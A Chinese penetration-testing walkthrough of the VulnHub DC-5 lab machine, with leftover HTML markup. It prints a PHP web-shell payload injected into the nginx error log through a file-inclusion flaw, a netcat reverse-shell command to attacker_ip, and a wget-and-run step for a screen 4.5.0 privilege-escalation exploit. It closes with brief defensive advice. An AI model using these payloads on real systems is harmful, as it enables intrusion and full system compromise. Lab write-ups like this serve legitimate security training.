DC-5 靶机渗透测试教学文档<\/h1>

一、环境信息<\/h2>

靶机下载地址<\/strong>: https:\/\/vulnhub.com\/entry\/dc-5,314\/<\/a><\/li> <\/ul>
二、信息收集阶段<\/h2>
1. 主机发现<\/h3>
使用以下命令发现存活主机:<\/p>
nmap -sn 192.168.44.0\/24 <\/span><\/span># 或<\/span> <\/span><\/span>arp-scan -I eth0 -l <\/span><\/span><\/code><\/pre>2. 端口扫描<\/h3> 扫描结果显示靶机开放了两个服务:<\/p> 80端口(HTTP服务)<\/li> RPC服务<\/li> <\/ul> 3. 目录扫描<\/h3> 使用工具如dirb、gobuster或dirsearch扫描网站目录结构<\/p> 三、漏洞发现与利用<\/h2> 1. 文件包含漏洞发现<\/h3> 发现footer.php<\/code>文件，显示版权信息且每次访问时间会变化<\/li> thankyou.php<\/code>页面下方也有版权字段，推测thankyou.php<\/code>包含了footer.php<\/code><\/li> 确认存在文件包含漏洞<\/li> <\/ul> 2. 文件包含漏洞利用<\/h3> 由于漏洞只能读取文件内容，需要创造性利用:<\/p> 思路<\/strong>: 利用网站日志文件写入木马<\/p> Nginx默认日志路径: \/var\/log\/nginx\/<\/code><\/li> 包含两个文件: access.log<\/code>(访问日志)和error.log<\/code>(错误日志)<\/li> <\/ul> <\/li> 实施步骤<\/strong>:<\/p> 访问一个不存在的目录，URL中包含一句话木马代码<\/li> 错误信息会被记录到error.log<\/code>中<\/li> 通过文件包含漏洞访问error.log<\/code>文件<\/li> <\/ul> <\/li> 实际操作<\/strong>:<\/p> # 访问包含木马的URL<\/span> <\/span><\/span>curl "http:\/\/target\/<?php system(<\/span>$_GET['cmd']); ?>"<\/span> <\/span><\/span> <\/span><\/span># 然后通过文件包含访问error.log<\/span> <\/span><\/span>http:\/\/target\/thankyou.php?file=<\/span>\/var\/log\/nginx\/error.log <\/span><\/span><\/code><\/pre><\/li> 注意事项<\/strong>:<\/p> 直接访问可能导致URL编码问题破坏PHP代码<\/li> 建议使用Burp Suite抓包并手动构造请求<\/li> <\/ul> <\/li> <\/ol> 四、获取WebShell<\/h2> 使用蚁剑(AntSword)连接成功<\/li> 建立反向shell: # 在蚁剑中执行<\/span> <\/span><\/span>nc -e \/bin\/bash attacker_ip 4444<\/span> <\/span><\/span><\/code><\/pre><\/li> 创建交互式shell: python -c 'import pty;pty.spawn("\/bin\/bash")'<\/span> <\/span><\/span><\/code><\/pre><\/li> <\/ol> 五、权限提升<\/h2> 1. 初步提权尝试<\/h3> # 检查sudo权限<\/span> <\/span><\/span>sudo -l <\/span><\/span> <\/span><\/span># 查找具有SUID权限的文件<\/span> <\/span><\/span>find \/ -perm -u=<\/span>s -type f 2>\/dev\/null <\/span><\/span><\/code><\/pre>2. 利用screen漏洞提权<\/h3> 发现漏洞<\/strong>:<\/p> 发现系统安装了screen 4.5.0版本<\/li> 在searchsploit中找到对应漏洞<\/li> <\/ul> <\/li> 漏洞利用<\/strong>:<\/p> ExploitDB中POC路径: \/usr\/share\/exploitdb\/exploits\/linux\/local\/<\/code><\/li> 是一个bash脚本，可直接执行<\/li> <\/ul> <\/li> 实施步骤<\/strong>:<\/p> # 在攻击机上启动HTTP服务<\/span> <\/span><\/span>python3 -m http.server 80<\/span> <\/span><\/span> <\/span><\/span># 在靶机上下载并执行POC<\/span> <\/span><\/span>wget http:\/\/attacker_ip\/exploit.sh <\/span><\/span>chmod +x exploit.sh <\/span><\/span>.\/exploit.sh <\/span><\/span><\/code><\/pre><\/li> <\/ol> 六、总结<\/h2> 渗透路径<\/strong>:<\/p> 信息收集 → 文件包含漏洞发现 → 日志文件注入 → WebShell获取 → 权限提升<\/li> <\/ul> <\/li> 关键点<\/strong>:<\/p> 文件包含漏洞的创造性利用<\/li> 日志文件注入技巧<\/li> screen 4.5.0版本的提权漏洞<\/li> <\/ul> <\/li> 防御建议<\/strong>:<\/p> 限制文件包含功能<\/li> 及时更新软件版本<\/li> 限制日志文件访问权限<\/li> 最小化SUID权限文件<\/li> <\/ul> <\/li> <\/ol>